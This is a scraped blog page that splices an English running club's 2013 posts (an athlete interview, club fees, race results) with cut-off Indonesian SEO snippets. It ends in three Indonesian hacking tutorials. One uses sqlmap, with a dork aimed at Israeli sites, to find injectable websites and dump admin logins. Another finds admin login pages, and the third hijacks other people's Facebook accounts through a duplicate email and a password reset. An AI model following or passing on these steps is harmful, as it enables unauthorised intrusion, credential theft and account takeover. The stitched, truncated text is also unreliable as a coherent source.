Electronic currency exchanger list 2013

Monday, 30 December 2013

H+P Athlete Spotlight: Dave Rutherford

In the first edition of H+P Athlete Spotlight, we had the opportunity to sit down and interview (i.e. chat over Facebook) the legendary Dave Rutherford (aka @ENDURdave, aka Doritos Dave).  Dave has had a diverse and extremely successful tenure in endurance sports.  From duathlons and marathons, to the ENDURrun and trail races, he seems to have done it all at a high level.  Not only this, but he does it all while not being afraid to indulge in his favourite Starbucks source of caffeine+sugar and occasional* bag of Doritos.  Here's what he had to say:

H+P: How long have you been running for? 

DR: About 11 years now, Started out more focused on Duathlon but quickly found I was a much better runner than cyclist.

H+P: When did you first realize: You know what, I am going to push the envelope here and see how far I can push my limits?

DR: I came in about 364 out of 700 in my first Duathlon (The Brick, now Victoria's, in 2003). I had no clue what I was doing but I was hooked. I saw how I could improve in so many ways. That appealed to both my analytical and competitive sides.

H+P: You've competed in an array of very challenging races. What is the toughest race experience you've ever had? What happened? 

DR: Probably the ENDURrun Sport in 2008. By 2007 I thought I was ready to take on the ENDURrun which I'd watched in awe from afar for several years. The first step I decided would be to tackle the last three days of it, the Sport. I had a great first two stages and then my worst marathon ever. Like my first Du I realized how much I didn't know. I learned so much and got a solid sense for what and how I would need to improve in my training to tackle the Ultimate week long event and came back in '09 to run the full week and PB'd the marathon on the last day.

H+P: There are so many different distances, terrains and ways to race these days- what type of race do you excel at? What type of race is your greatest weakness? 

DR: My results show I do well in season long event series (Subaru ODS '07 Age Group win, OUS 50K Challenge Cup '12 win) and stage events like the ENDURrun at which I've always finished strong. My weakness is definitely the standalone marathon, where I have always under-performed from what race comparative number crunching says I should be able to hit time-wise.

H+P: You're a very knowledgeable runner who is constantly tweaking your training to achieve different goals. Were you ever surprised by how much one form of training (i.e. adding more mileage, adding intervals) changed your performance? Was there ever a type of training that ended up not giving you the results you expected? 

DR: Surprised? Definitely. I think the key is varied training. When I started I was running training 10K's at the same pace that I could race them. Basically plateaued in my first year of racing. Then I learned to apply two main overarching and co-dependent training themes. Number one is run slower in training to race faster, and number two is run faster in training to race faster. I started to apply those themes day over day, week over week, and across the calendar year and was amazed at the near immediate improvements and I'm still setting PB's a decade later. The only type of training that I have found that does not deliver results is unfocused, inconsistent training - nothing can or should be expected. I don't mean having every day planned out, but at a minimum I need to have an overall structure to a season, with key races and workouts (rough build up plan, long runs, and big blocks) penciled in.
H+P: What made you decide to join H+P? What's your favourite thing about the group? 

DR: My reasons to join H+P were many. Probably the biggest was just to keep my training fresh. Joining H+P got me out of a couple of comfort zones by adding in group training and evening training. As I typically fill in my detailed training more on a day to day basis, H+P fits perfectly as it gives me a couple of workouts a week to let a coach sort the details for the session. It's fun to just show up, hear the workout, and hammer. It is also awesome to have people to both chase and push with friendly competition and encouragement. I am inspired by each teammate, regardless of their speed, who is out pushing their own limits and comfort zones.

H+P: What are the big goals for 2014?
DR: My big goal for 2014 is to not run a marathon or ultra... Seriously, though, and more positively stated, I'm going to focus on "shorter" races, 5K-30K. I'll keep a mix of road and trail. I'll be gunning for a Half marathon PB in the Spring and/or Fall. I'll take another run at sub 38 10K at the Classic in June. I expect to have fun with that and the other races in the Battle of Waterloo & Waterloo Running Series along with a few other favourites like Around the Bay and the Phlox Run 25K Trail race with my teammates and other local running friends.

H+P: Are the rumors of you being sponsored by Doritos true?

DR: No Doritos sponsorship yet but will launch a Fall consumption campaign again next year!

Thursday, 19 December 2013

Cara Mempromosikan Blog Supaya Terkenal

Cara mempromosikan blog supaya terkenal itu sangat beragam. Lepaskan pemikiran teman-teman dari batasan mesin pencari, karena untuk mempromosikan blog itu sangat banyak cara yang bisa anda tempuh. Saya akan membagikan beberapa cara yang saya ketahui di sini.

Mempromosikan blog secara online

Menggunakan facebook untuk mempromosikan blog

Saat ini facebook adalah social media yang paling

Wednesday, 11 December 2013

Registration and team schedule for 2014

Hello H+P friends!  It's hard to believe another year has gone by.  We are very excited for an even better year of training and excellent performances with the team in 2014!

Our goal from the start has been to develop a fun training group that also includes the highest quality workouts and coaching.  At the same time, wanted to make sure it was accessible to everybody.  That is why we started this off as a free group, and it has been an incredible experience since the beginning.

With the growth of the H+P in the past year, a number of ideas and financial demands have popped up in order to keep the group running smoothly and successfully.  Because of this, we are going to ask for a small club fee for 2014.  Don't worry, it's cheap- cheaper than entering ONE race:

Before Feb 1st, 2014
After Feb 1st, 2014
Student - $20
Adult- $30
Family- $60
Student- $30
Adult- $40
Family- $80

This small amount of money that we gain from this will help us to do a number of little things that we wanted to do this year.  For instance, buying more sidewalk chalk for the summer TT and having more apparel on hand for when people request something (I think Brendan has been waiting for his shirt for 6 months now haha).  The money will be spent on making the club better for everybody in small ways, all year around.

Just to make sure the group remains awesome, there WILL be benefits to joining.  Actually, some might say that you will make money by joining.  Our goal is to make the club more than just a "good deal," but an amazing experience for everybody.  With your membership, you will get:

Membership Benefits (2014)

  • Access to all outdoor cycling and running workouts with coaching for the entire 2014 year
  • Your own membership card
  • An optional online profile on the H+P website
  • Team discounts at select Waterloo Running Series events (and others such as Road2Hope)
  • Team discounts at Runners' Choice Waterloo (20% off footwear, apparel and accessories, 10% off electronics and nutrition products)
  • Team discounts at McPhail's Cycle and Sport (15% off parts and accessories)
  • Free entry to the H+P summer TT
  • Prizes from our sponsors at events such as pre-runs and socials
  • A FREE injury assessment card (up to $75 value) from Dr. Sean Delanghe at Price Chiropractic and Fitness
  • The best training environment EVER 
So there you have it!  We are looking forward to making 2014 even better than the last.  Thank you all so much for your support along the way.  
If you would like to register, click HERE.

Team Schedule (2014)

February 23rd: The Re-Fridgee-8er (race #1 of the Battle of Waterloo)

March 30th: Around the Bay

June 15th: The Waterloo Classic (race #2 of the Battle of Waterloo)

August 10th: ENDURrun 
*We will be putting together a competitive male and female team with our best runners.  There will also be at least one fun team.  Of course, there is always the option to do the entire thing yourself!

September 12-14th: Centurion Cycling Blue Mountains (50 or 100M race)

October 19th: The Oktoberfest Run(Race #3 of the Battle of Waterloo)

December 13th: The Santa Pur-Suit

Now, time to lay down some base training!

Tuesday, 10 December 2013


Cara membuat website sendiri sebenarnya bisa agak sedikit merepotkan, tergantung cara saudara melakukannya. Untuk membuat sebuah website sebenarnya bisa menggunakan domain TLD apa saja, tapi kali ini saya akan membahasnya khusus dengan domain .com, karena domain ini memberikan beberapa keuntungan dalam penggunaannya....

Kalau saudara ingin membuat sebuah website, maka saudara tentunya harus

Monday, 9 December 2013

Cara Mendaftar dan Membuat Akun Facebook

Kita perlu mempelajari cara daftar ataupun membuat akun Facebook, sebagai langkah awal bermain di social media. Kenapa? Karena bagaimanapun Facebook adalah jejaring sosial yang terbesar saat ini. Jumlah pengguna yang melimpah di seluruh dunia tentu juga menjadi potensi trafik yang sangat besar.

Pertambahan pengguna facebook yang mendaftar dari hari ke hari semakin meningkat. Jadi potensi

2013 Santa Pur-Suit

H+P fished off the 2013 racing season on a successful and festive note!  While it wasn't one of our original A-races, we did end up having a great showing at this year's addition of the Santa Pur-Suit.  Here are the team results:

First off, the team ended up winning the corporate division in an average time of 19:16.  CLICK HERE for results.  This was a bittersweet result since this is the last time H+P will be entering in the corporate division in the WRS.  Next year, there will be an open team division, where 5 athletes (rather than 3) score points! 

And here are the team individual results (CLICK for full):

Coach Sean was lucky enough to win the race in a time of 17:44

In his first race as an H+P runner, Jesse Burt had an excellent performance, finsihing 3rd overall and winning his AG
Holger also had a successful H+P debut.  While he was not happy with his time, he still was third place on the team, and placed 4th in his AG!

Mailman made a great return from injury, coming in 13th overall and 2nd in his AG!

Vicki had an outstanding H+P debut, finishing in 3rd in her AG, and not far off her PB despite running in a Santa Suit!

Will, despite battling a cold that popped up just days before, still managed a 6th place in his category!

And finally, Mark Potvin (below) really, as he likes to put it, "stayed alert, and stayed safe" out there!

Friday, 6 December 2013

Cara Membuat Blog Yang Benar Untuk Bisnis Online

Artikel cara membuat blog yang benar untuk bisnis online ini sengaja dibuat untuk membantu mereka yang mencoba memanfaatkan blog sendiri sebagai media promosi. Kenapa ini perlu? Karena banyak sekali orang yang sudah ketahuan bisnis onlinenya akan gagal sejak blog mereka jadi....

Di dalam artikel ini saya tidak akan membahas lagi cara membuat blog sendiri menggunakan blogspot atau cara

Apa perbedaan Freshbot dan Deepbot Googlebot Dalam Perayapan?

Banyak orang mengedit artikel lamanya dan bingung karena lama sekali editannya belum terindeks juga di SERP. Padahal jika mereka mengetik artikel baru atau fresh content akan terindeks saat itu juga. Apa yang mengakibatkan itu semua?

Kalau untuk masalah yang ini, kita perlu mengetahui bahwa Googlebot itu ada dua jenis, yaitu Freshbot, dan Deepbot. Jadi bagaimana kedua jenis Googlebot ini

Wednesday, 4 December 2013

Google Update Pagerank Terbaru Desember 2013

Sekilas Info: Google Update Pagerank Terbaru Desember 2013 - Setelah sebelumnya saya menuliskan bahwa Google tidak akan mengupdate pagerank pada tahun 2013 ini, ternyata tidaklah demikian. Baru-baru ini Google melakukan update pagerank.... Rupanya Google punya strategi sendiri.

Blog trikmudahseo yang relatif sudah terabaikan ini masih bisa kebagian PR3. Jadi kemungkinan teman-teman bisa

Tuesday, 3 December 2013

Cara Mengatasi Gambar Berubah Gelap Saat Diunggah Ke Blogspot

Saya baru sadar kemarin kalau gambar yang saya upload berubah menjadi lebih gelap dari biasanya. Karena ini tidak menyenangkan jadi saya mencari tahu cara mengatasinya. Ternyata masalah ini sudah cukup lama, mungkin saya tidak menyadari perubahan kualitas gambar ini karena belakangan jarang merawat blog ini lagi....

Mengubah Setelan Google + Untuk Mengatasi Gambar Berubah Gelap

Ya, ternyata

Cara Mendaftar Globallshare, buat akun Gas 2014 dapat Saham

Globallshare adalah social network terbaru yang saat ini mencoba mengembangkan konsep yang berbeda. Walaupun logonya seperti Google dan desainnya seperti facebook, tapi sepertinya social network yang satu ini tidak ada hubungannya dengan keduanya. Entah kenapa hampir di semua promosi yang ada di website Indonesia menyebutkannya sebagai kepunyaan Google.

Yang unik dari jejaring sosial

Berapa Banyak Link Dalam Halaman Web?

Banyak blogger pemula yang bertanya sebaiknya berapa banyak link yang mereka letakkan dalam sebuah halaman website? Ini sebenarnya pertanyaan yang terlihat tidak penting tapi sangat penting. Apa maksudnya? Silahkan baca artikel SEO singkat berikut ini....

Berapa Jumlah Link Maksimal

Google mengatakan bahwa dulu mesin mereka membatasi pengindeksan suatu halaman website sampai 100kb, dan

Monday, 2 December 2013


Cara mendownload video youtube tanpa software sebenarnya sangat mudah. Youtube sendiri adalah situs berbagi video yang paling terkenal di dunia saat ini. Sebuah situs yang muncul akibat rasa tidak puas pembuatnya akan keterbatasan email untuk mengirim video ke temannya. Akhirnya dibuatlah youtube yang belakangan menjadi populer dan dibeli oleh Google.

2013 Holiday Party Relay Results

Congrats to everybody who competed in the 2013 H+P Holiday Party Relay.  I think it is safe to say that NOBODY loses a holiday relay.  More importantly, it is widely understood that completing this standardized challenge in under 2 minutes is considered elite- and every single team achieved this feat comfortably!

A HUGE congrats to Holger for winning the picture voting challenge- He was really working the pipes when this one was taken!

Here are the results:
  1. Polliwogs: 00:57 (Mike P, Val, A.Broom, T-Bone)
  2. Mike and the Mechanics: 00:58.5 (Mike H, Laura, Andrea, Craig/Mountain Man)
  3. Jilly Jill and the funky bunch: 1:09 (Reid, Nolan, Jeremy, Gillian)
  4. Payton and her boyfriends: 1:09.5 (Brendan, Payton, Holger, Mailman)
  5. Team Edward: 1:14 (Michael, Ed, Candice, Nicole)
  6. Chocolaholics: 1:20 (Dawn, Vicki, Bill, Will)
  7. Shidoobee: 1:18 (+10s penalty) (Sue, Liz, Jen Juan)
  8. No Name: 1:32 (Patrick, Liz, Kevin, Kerri) 
Also, a congrats goes out to our MVP's from 2013: Val and Greg (click here)

Finally, a huge congrats goes our to Juan for winning the food competition.  He will have the recipe for all of us soon!  Here's a pic of Juan attacking the relay course:

 Finally, here are some other great pics from the party!  Check out the full collection in our Facebook Album

Wednesday, 20 November 2013

Cara Membuat Website Sendiri dengan CMS Wordpress

Cara membuat website sendiri dengan menggunakan wordpress sebenarnya sangat sederhana. Jadi saya akan mencoba menjelaskannya di sini. Yang perlu diketahui ialah, bahwa pada awalnya wordpress dikenal sebagai sebuah platform blog saja, tapi hari ini wordpress sudah menjadi brand CMS atau Content Management System yang sangat terkemuka.

Apa itu CMS?

Content Management System adalah program

Tuesday, 19 November 2013

Template Blog Blogspot SEO Friendly Gratis!

Template blog yang SEO Friendly adalah template yang dibuat menurut standar Search Engine. Berhubung tadi malam tidak ada kerjaan jadi saya coba memodifikasi satu versi template blogspot untuk dijadikan lebih SEO Friendly. Template blog gratis ini sudah dioptimisasi untuk anda semua dan desain kali ini saya bagi menjadi 5 variasi warna. Jadi silahkan dipilih warna mana yang menjadi favorit

Monday, 18 November 2013

External Link Baik Untuk SEO?

Apakah external link baik untuk SEO? Saat ini cukup banyak teman-teman blogger yang takut memasang external link pada artikelnya karena takut external link ini akan merusak optimasi dari blog. Jadi saya akan mencoba membahas ini dari perspektif saya....

Pengaruh External Link Pada SEO

Sebenarnya yang ini sudah pernah saya bahas dalam artikel Apa itu external links dan pengaruhnya pada SEO.

Pengaruh Teknik Backlink Shortened URL pada SEO

Belakangan ini semakin banyak yang melakukan teknik backlink menggunakan shortened URL seperti goo.gl. Apa pengaruh teknik seperti ini pada SEO? Saya coba membahas sedikit karena saat ini cukup banyak yang menanyakan masalah yang satu ini.

Cara Google Melihat Short URL sebagai backlink

Sudah sering kita lihat banyaknya orang berkomentar dengan menggunakan Short URL, baik di halaman-halaman

Monday, 4 November 2013

H+P at the 2013 Road2Hope

The last massive 2013 team-race for Health and Performance was this past weekend in Hamilton at the Road2Hope half and full marathon!  The team showed another ridiculous level of improvement.  If you recall, two weekends ago, a PBPB (personal best personal best) was set in the total number of personal bests achieved.

This past weekend, fewer athletes raced, so it was impossible to achieve a new PBPB.  HOWEVER, we did manage to reach a new personal best DIFFERENTIAL personal best- a PBDPB.  In other words, the sum of the total minutes taken off our previous PB's was the best we have ever seen at one given race.  Great work team!  

Jordan and Greg hammering away!

Here are the results along with the PBD (personal best differential):

Full Marathon- CLICK for full results.

Jordan Schmidt went 3:02, good enough for 40th overall, and 7th in his AG. PBD: 44mins

Coach Dyce finished in 3:05:59, earning him 55th place overall, and top 10 in his AG. PBD: 35mins 

Val went 3:11:38, earning her 2nd place in her AG, and 8th place overall!  PBD: 2 mins (from a few months ago!)

Graham finished in 3:27:37, an amazing improvement in a short period of time!  PBD: 18 mins

Helen ran 3:56:44!  Another amazing improvement!  PBD: 8mins

Total PBD for the marathon: 107mins

Half Marathon- CLICK for full results.

Coach Sean went 1:17:48, 7th overall, 2nd in his AG. PBD: 6 mins

Craig ran 1:32:20- his first real half, and beat coach Gill by ONE SECOND! PBD: N/A

Coach Gill ran 1:32:21, earning her 24th overall, and 3rd in her AG.  PBD: 9 mins

Dragan ran 1:39:56, placing him 30th in his AG!  PBD: 11mins

Lori ran 1:54:58, an amazing result considering some injuries she is facing.  PBD: 5 mins

Amy had a great race, coming in just over 2 hours!  PBD: 3 mins

Mark ran his first half ever on no training- hopefully he can walk today!  PBD: INF

Total PBD for the half marathon: 34mins

And the grand total is....

Some of the team the day before our PBDPB

TOTAL PBD: 141 mins...or 2 hours and 21 minutes!  And NEW PBDPB!

Thanks everybody for a great racing season!  We have big plans for next year including; Around the Bay, H+P TT record-breaking attempts, more marathon PB's,  5 and 10K PB's, some cycling races, ENDURrun, multi-sport stuff and more!  

Thursday, 31 October 2013

SQL Map Tutorial

Ok langsung saja download bahan-bahanya 
1. Active Python
2. Python 2.7.5
3. SQL Map

Langkah >
- Instal Python 2.7.5 sampai selesai
- Instal Active Python sampai selesai dan restart
- Ekstrak file SQL Map di Drive C

Selanjutnya kita cari target dengan Dork " inurl:id= intext:"error in your sql syntax" + site:.il

Setelah dapat target lalu kita masuk ke CMD dan ketikan perintah
cd\ > enter
cd sqlmap > enter

setelah itu ketikkan sqlmap.py -u ( utl target ) --current-db > enter

Tunggu sampai scaning pencarian database selesai.
kalau vuln pasti ketemu database nya

setelah ketemu database nya kemudian ketikan perintah
sqlmap.py -u (url target ) --tables -D ( nama database)

Note: -- tables ( untuk mencari table pada database)
          - D ( nama database )

Tuh dah ketemu table nya,,dan cari table yang mengacu pada user loginya

Lalu ketikan perintah sqlmap.py -u ( url target ) --columns -T ( nama table ) - D ( nama database)

Tunggu sampai proses pencarian columns selesai.
setelah colum ketemu maka tampilan columns seperti gambar.

Kemudian ketik perintah sqlmap.py -u ( url target ) --dump -C (nama column ) -T ( nama table ) -D ( nama database )

Tunggu sampai selesai. jika selesai pencarian akan seperti gambar

Setelah itu tinggal mencari halaman admin loginya dan login dengan username dan password yang kamu dapat tadi.

Sekian dari saya Backdoor Sakit Hati ( 1mp4ct_404 )
Happy Hacking

Mencari Admin Login Website Dengan Admin Page Finder

Ok langsung saja Download bahanya

1. Active Python

2. Python 2.7.5

3. Admin Page Finder

Pertama instal Active Pythonya sampai selesai
Kedua Instal Pythonya sampai selesai
Kemudian Restart Computer.
Buat new documen di drive C dan beri nama Tof

 Ekstrak Admin Page Finder nya ke folder Tof yang di buat tadi.
Ok selanjutnya kita coba, masuk ke Run > cmd dan enter

setelah msuk ke jendela coomand lalu ketik
cd\ > enter
cd Tof > enter

setelah sampai ke C:\Tof > kemudian ketik langsung
C:\Tof>TOF.py > enter

Setelah itu masukan website yang ingin kamu cari halaman loginya.
Example : www.target.com dan enter

setelah tampil seperti gambar di bawah kamu ketikan saja angka "1" ( tanpa tanda petik ) dan enter

Tunggu sampai proses scanning selesai..

Sekian dari saya Backdoor Sakit Hati ( 1mp4ct_404 )

Mereset Password Facbook Orang Lain

Ok, sebelumnya saya telah menulis tutorial Membuat Email Duplikat Teman Facebook.
Nah,sekarang cara mereset password Facebook dari email yang anda buat tadi.

Langsung ja siapkan bahanya..
- kopi
- Rokok
- cemilan.. :D

Pertama login ke Facebook

Kemudian klik Lupa kata sandi Anda.
Kemudian akan tampil jendela " Temukan Akun Anda." Masukan email d an klik cari.

Kemudian akan tampil seprti gambar.

Lalu kamu akan tampil jendela verifikasi

Setelah itu login ke Yahoo dengan Email Duplikat yang kamu buat.

Lalu ke kotak masuk

Bila di kotak masuk tidak ada code verifikasinya, masih ada cara lain, kembali ke Atur Ulang Kata sandi Anda. tapi anda pilih Gunakan Akun Yahoo saya.Lihat Gambar

setelah itu kamu akan masuk ke tahap reset Password.. wkwkwkwk...

Setelah itu tinggal login ke Facebook dah,,, dan selamat kamu ud bisa memegang akunya...wkwkwk

Salam dari saya Backdoor Sakit Hati ( 1mp4ct_404 )